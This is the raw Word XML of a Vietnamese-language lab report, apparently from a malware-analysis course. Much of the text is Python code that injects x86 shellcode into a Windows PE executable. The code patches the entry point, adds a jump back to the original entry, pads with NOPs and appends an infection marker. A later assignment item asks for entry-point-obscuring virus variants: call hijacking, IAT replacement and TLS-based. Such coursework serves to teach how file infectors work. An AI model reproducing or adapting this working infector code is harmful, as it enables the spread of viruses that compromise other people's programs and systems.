wp14:textId="3D18CBCA">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\xbc\x87\x1c\x24\x52\xe8\x5f\xff\xff\xff\x68\x33</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37AD102E" wp14:textId="1BBA9B64">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\x30\x58\x20\x68\x20\x4e\x54\x32\x68\x6e\x20\x62</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1F26BD9F" wp14:textId="0D34502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\x79\x68\x63\x74\x69\x6f\x68\x49\x6e\x66\x65\x31</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433D4A69" wp14:textId="4CEF3436">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\xdb\x88\x5c\x24\x12\x89\xe3\x68\x33\x37\x58\x20</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765A4510" wp14:textId="50BF03CD">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\x68\x35\x32\x30\x32\x68\x35\x2d\x32\x31\x68\x32</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6901BDE6" wp14:textId="0B0009B8">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\x31\x39\x35\x68\x2d\x32\x31\x35\x68\x32\x30\x36</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300B611B" wp14:textId="67304F99">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="CE917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\x35\x68\x32\x31\x35\x32\x31\xc9\x88\x4c\x24\x1a</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="206B0EFF" wp14:textId="199FB89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\x89\xe1\x31\xd2\x6a\x40\x53\x51\x52\xff\xd0\x90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Sửa lại vì để thêm shellcode call entry point</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="43D3CB5A" wp14:textId="419D2960">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shellcode += b"\x89\xe1\x31\xd2\x6a\x40\x53\x51\x52\xff\xd0\x31"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="42033B24" wp14:textId="5F1D3CF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shellcode += b"\xc0\x50\xff\x55\x08"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="35482CC1" wp14:textId="13D7B78C">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2176C918" wp14:textId="2158BC57">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minShellCode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len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8</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#Độ dài shellcode + 4 byte mov eax, returnAddress + 4 byte call eax + 10 byte padding nop</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="540D514F" wp14:textId="7A0FFBC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"Min shellcode: "</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minShellCode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C8FA374" wp14:textId="53A89A0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findSection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C02B638" wp14:textId="5522C1A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returnAddress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address_of_entry_point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70AF49D" wp14:textId="51F5D0AE">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\xB8</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returnAddress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.to_bytes(</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'little'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#Mov eax, returnAddress</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2898E9AA" wp14:textId="231B9DFD">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\xFF\xD0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#Call eax</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="773D8A91" wp14:textId="3CF1DCC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if</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len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4</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186BBA36" wp14:textId="183181CC">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paddingBytes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\x90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B5CEA8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10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#Nop</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="381FD7FC" wp14:textId="2849A14B">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paddingBytes</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="395D38F9" wp14:textId="2BBD03B7">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\x90\x90\x90\x90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#Padding nop ở dầu shellcode</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2E57F3FA" wp14:textId="3295CA6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.set_bytes_at_offset(</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new_raw_data</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shellcode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289BB31" wp14:textId="14B9A2C3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="9CDCFE"/>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.OPTIONAL_HEADER.AddressOfEntryPoint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new_entry_point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4D4D4"/>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image_base</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7DB4E922" wp14:textId="0B62CC5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.write(</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494591D" wp14:textId="56058E0B">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"Shellcode injected to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3EAAA99" wp14:textId="441A18DE">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pe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.close()</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="1707AF25" wp14:textId="0F3D7520">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7A509DC9" wp14:textId="5314B8B6">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####Thêm đánh dấu</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="48C956D5" wp14:textId="6B7BDAAE">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7CA668"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Mở file ở chế độ append binary ('ab') và sử dụng os to seek to the end of the file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6401D144" wp14:textId="5F928A19">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with</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open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E9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'ab'</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36DA79EB" wp14:textId="7C165C41">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seek</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B5CEA8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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os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SEEK_END</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Di chuyển con trỏ đến cuối file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="43A894BF" wp14:textId="23F8347F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="7CA668"/>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file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DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>write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b</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\x4C\x00\x6F\x00\x76\x00\x65\x00</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w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="7CA668"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Thêm 8 byte</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="17DEF616" wp14:textId="2A6A5361">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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4C2B9D24" wp14:textId="4A15ED5A">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except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4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exception</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C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as</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5BF2DCDA" wp14:textId="32A0ADC8">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e</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2F7FB8A0" wp14:textId="5967128D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pP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3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print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r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"Error with file </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9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pe_file</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="466FF23D" wp14:textId="35F37456">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Thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="44B6834D" wp14:textId="68D6AF0A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FD46564">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="6B6900CF" wp14:anchorId="77ECDEFE">
            <wp:extent cx="5724524" cy="2790825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2138633367"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a6c70751df7f45ae">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="2790825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="62D22B99" wp14:textId="6E25E01F">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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="49E34EAD" wp14:textId="12236C79">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="198EEE8F">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="278D5D7C" wp14:anchorId="1F8A172B">
            <wp:extent cx="5724524" cy="2562225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="82286422"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5940139e562c4176">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="2562225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="198EEE8F">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="33C36741" wp14:anchorId="76F46458">
            <wp:extent cx="5724524" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2074790398"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dad2ae72aec64662">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="2362200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="01701C8B" wp14:textId="7DAE7645">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>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1C921789" wp14:textId="5CAFBC76">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mức yêu cầu 03 - RQ03 (5đ):</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thay vì thay đổi Entry-point của chương trình, Hãy áp dụng lần lượt 02 chiến lược lây nhiễm trong nhóm kỹ thuật Entry-Point Obscuring (EPO) virus – che giấu điểm đầu vào thực thi của mã virus (virus code) cho Virus đã thực hiện ở RQ01/RQ02. Một số dạng EPO-virus có thể xem xét để thực hiện yêu cầu này bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="1A2CD2C4" wp14:textId="4F21A36C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Call hijacking EPO virus.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0501F522" wp14:textId="3AAD2B76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Import Address Table-replacing EPO virus.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="1AC6956D" wp14:textId="508FDFB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TLS-based EPO virus.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="60BD194C" wp14:textId="20CCD0B3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="36B01474" wp14:textId="47379D9B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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6af4d2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9ab52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9536de"/>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a48b6a"/>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UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Inte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bc24e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UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Inte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a0ac9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UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Inte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7E17FE"/>
    <w:rsid w:val="08922FE8"/>
    <w:rsid w:val="0B7E17FE"/>
    <w:rsid w:val="198EEE8F"/>
    <w:rsid w:val="2B94C7A8"/>
    <w:rsid w:val="2FD46564"/>
    <w:rsid w:val="3742ED17"/>
    <w:rsid w:val="52BFA58F"/>
    <w:rsid w:val="61427D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E17FE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1E095ED7-6B12-4AA6-BB0C-649B83C35D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a8fde65b5004309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="Ra6c70751df7f45ae" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="R5940139e562c4176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="Rdad2ae72aec64662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R36971ad75a7f46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2024-03-22T14:48:31.6156912Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-22T14:51:59.8233669Z</dcterms:modified>
  <dc:creator>Hoàng Anh Khoa</dc:creator>
  <lastModifiedBy>Hoàng Anh Khoa</lastModifiedBy>
</coreProperties>
</file>